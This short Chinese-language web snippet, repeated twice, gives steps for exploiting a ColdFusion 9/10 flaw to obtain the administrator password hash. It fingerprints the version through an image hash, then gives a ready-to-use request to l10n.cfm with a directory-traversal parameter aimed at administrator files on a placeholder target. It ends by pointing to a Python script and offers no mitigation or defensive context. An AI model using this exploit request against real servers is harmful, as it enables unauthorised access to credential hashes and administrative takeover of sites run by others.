<p>ColdFusion 版本9/10远程密码HASH获取漏洞<br></p><p>首先测试目标网站地址是否可达:</p><p><a href="http://target_web_site/" rel="nofollow">http://target_web_site/</a>CFIDE/administrator/images/loginbackground.jpg</p><p>通过上述图片的hash值可判断版本</p</p><p>然后测试:</p><p><a href="http://target_web_site/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" rel="nofollow">http://target_web_site/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp</a><br></p><p>如果成功的话就可以,接下来可以直接参考python脚本了.</p>
<p>ColdFusion 版本9/10远程密码HASH获取漏洞<br></p><p>首先测试目标网站地址是否可达:</p><p><a href="http://target_web_site/" rel="nofollow">http://target_web_site/</a>CFIDE/administrator/images/loginbackground.jpg</p><p>通过上述图片的hash值可判断版本</p</p><p>然后测试:</p><p><a href="http://target_web_site/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" rel="nofollow">http://target_web_site/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp</a><br></p><p>如果成功的话就可以,接下来可以直接参考python脚本了.</p>